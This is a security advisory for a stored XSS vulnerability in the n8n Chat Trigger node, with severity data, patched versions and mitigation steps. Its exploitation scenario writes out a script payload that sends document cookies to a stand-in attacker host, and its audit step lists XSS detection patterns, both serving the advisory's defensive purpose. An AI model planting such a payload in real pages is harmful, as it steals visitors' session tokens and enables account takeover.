GHSA-3c7f-5hgj-h279 — MEDIUM (CVSS 5.4)

Q: Is GHSA-3c7f-5hgj-h279 actively exploited?

No confirmed active exploitation of GHSA-3c7f-5hgj-h279 has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-3c7f-5hgj-h279?

1. PATCH: Upgrade to n8n 1.123.27 (v1 branch), 2.13.3, or 2.14.1 immediately — this is the only full remediation. 2. RESTRICT: If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC; audit current role assignments now. 3. DISABLE NODE: Set NODES_EXCLUDE=@n8n/n8n-nodes-langchain.chatTrigger in the environment to block Chat Trigger instantiation. 4. AUDIT: Grep existing workflow JSON exports for <script, javascript:, onerror, or base64 payloads in Custom CSS fields. 5. ROTATE: Invalidate all active chat session tokens after patching. 6. MONITOR: Alert on workflow save events that modify Chat Trigger CSS fields post-patch to detect residual or re-injected payloads.

Q: What systems are affected by GHSA-3c7f-5hgj-h279?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, workflow automation, LangChain integrations, public-facing chat interfaces, LLM API proxies.

Q: What is the CVSS score for GHSA-3c7f-5hgj-h279?

GHSA-3c7f-5hgj-h279 has a CVSS v3.1 base score of 5.4 (MEDIUM).

CISO Take

Any n8n deployment running the Chat Trigger node (LangChain integration) with a public chat URL is actively exposing all visitors to stored XSS — a workflow editor with legitimate credentials can silently backdoor every user who opens the chat. Patch to n8n 1.123.27, 2.13.3, or 2.14.1 immediately. If patching is blocked, restrict workflow edit permissions to fully trusted accounts only and disable the Chat Trigger node via the NODES_EXCLUDE environment variable.

What is the risk?

CVSS 5.4 Medium understates operational risk in AI-native environments. The Scope:Changed indicator (S:C) signals cross-boundary impact — the attacker plants the payload in the workflow configuration but detonates it in every chat visitor's browser session. n8n Chat Trigger nodes typically front LLM-powered assistants with access to RAG backends, API credentials, and workflow execution context. Session token theft here translates directly to access to the AI agent's toolchain. Low attack complexity once an authorized workflow editor account is compromised or abused. No active exploitation reported; not in CISA KEV.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
n8n	npm	< 1.123.27	`1.123.27`
187.3K OpenSSF 6.1 16 dependents Pushed 5d ago 43% patched ~3d to patch Full package profile →

Do you use n8n? You're affected.

Severity & Risk

CVSS 3.1

5.4 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Attack Surface

AV Network

AC Low

PR Low

UI Required

S Changed

C Low

I Low

A None

What should I do?

6 steps

PATCH

Upgrade to n8n 1.123.27 (v1 branch), 2.13.3, or 2.14.1 immediately — this is the only full remediation.
RESTRICT

If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC; audit current role assignments now.
DISABLE NODE

Set NODES_EXCLUDE=@n8n/n8n-nodes-langchain.chatTrigger in the environment to block Chat Trigger instantiation.
AUDIT

Grep existing workflow JSON exports for <script, javascript:, onerror, or base64 payloads in Custom CSS fields.
ROTATE

Invalidate all active chat session tokens after patching.
MONITOR

Alert on workflow save events that modify Chat Trigger CSS fields post-patch to detect residual or re-injected payloads.

Classification

Code Execution Data Extraction Agent Framework AML.T0011 - User Execution AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0053 - AI Agent Tool Invocation AML.T0078 - Drive-by Compromise AML.T0080 - AI Agent Context Poisoning

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.5 - AI system security and resilience A.8.5 - Security of AI systems

NIST AI RMF

MANAGE 2.2 - Mechanisms to sustain deployment of trustworthy AI are evaluated and applied MANAGE-2.2 - Mechanisms to sustain value of deployed AI systems

OWASP LLM Top 10

LLM05 - Improper Output Handling LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is GHSA-3c7f-5hgj-h279?

Any n8n deployment running the Chat Trigger node (LangChain integration) with a public chat URL is actively exposing all visitors to stored XSS — a workflow editor with legitimate credentials can silently backdoor every user who opens the chat. Patch to n8n 1.123.27, 2.13.3, or 2.14.1 immediately. If patching is blocked, restrict workflow edit permissions to fully trusted accounts only and disable the Chat Trigger node via the NODES_EXCLUDE environment variable.

Is GHSA-3c7f-5hgj-h279 actively exploited?

No confirmed active exploitation of GHSA-3c7f-5hgj-h279 has been reported, but organizations should still patch proactively.

How to fix GHSA-3c7f-5hgj-h279?

1. PATCH: Upgrade to n8n 1.123.27 (v1 branch), 2.13.3, or 2.14.1 immediately — this is the only full remediation. 2. RESTRICT: If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC; audit current role assignments now. 3. DISABLE NODE: Set NODES_EXCLUDE=@n8n/n8n-nodes-langchain.chatTrigger in the environment to block Chat Trigger instantiation. 4. AUDIT: Grep existing workflow JSON exports for <script, javascript:, onerror, or base64 payloads in Custom CSS fields. 5. ROTATE: Invalidate all active chat session tokens after patching. 6. MONITOR: Alert on workflow save events that modify Chat Trigger CSS fields post-patch to detect residual or re-injected payloads.

What systems are affected by GHSA-3c7f-5hgj-h279?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, workflow automation, LangChain integrations, public-facing chat interfaces, LLM API proxies.

What is the CVSS score for GHSA-3c7f-5hgj-h279?

GHSA-3c7f-5hgj-h279 has a CVSS v3.1 base score of 5.4 (MEDIUM).

Technical Details

NVD Description

## Impact An authenticated user with permission to create or modify workflows could inject malicious JavaScript into the Custom CSS field of the Chat Trigger node. Due to a misconfiguration in the `sanitize-html` library, the sanitization could be bypassed, resulting in stored XSS on the public chat page. Any user visiting the chat URL would be affected. ## Patches The issue has been fixed in n8n versions 1.123.27, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability. ## Workarounds If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit workflow creation and editing permissions to fully trusted users only. - Disable the Chat Trigger node by adding `@n8n/n8n-nodes-langchain.chatTrigger` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Exploitation Scenario

A threat actor with legitimate (or compromised) workflow editor credentials opens an n8n workflow containing a Chat Trigger node and injects <script>fetch('https://c2.attacker.com/x?t='+document.cookie)</script> into the Custom CSS field. The sanitize-html misconfiguration fails to strip the tag. The workflow is saved and published — the payload now lives in the persistent workflow configuration. A customer service agent, external user, or automated integration that opens the public chat URL executes the script automatically, exfiltrating the session token to the attacker. The attacker replays the token to authenticate as that user, accesses the n8n instance or any downstream AI service the chat was proxying (LLM API, RAG knowledge base, CRM integration), and pivots further through the connected workflow toolchain without triggering additional alerts.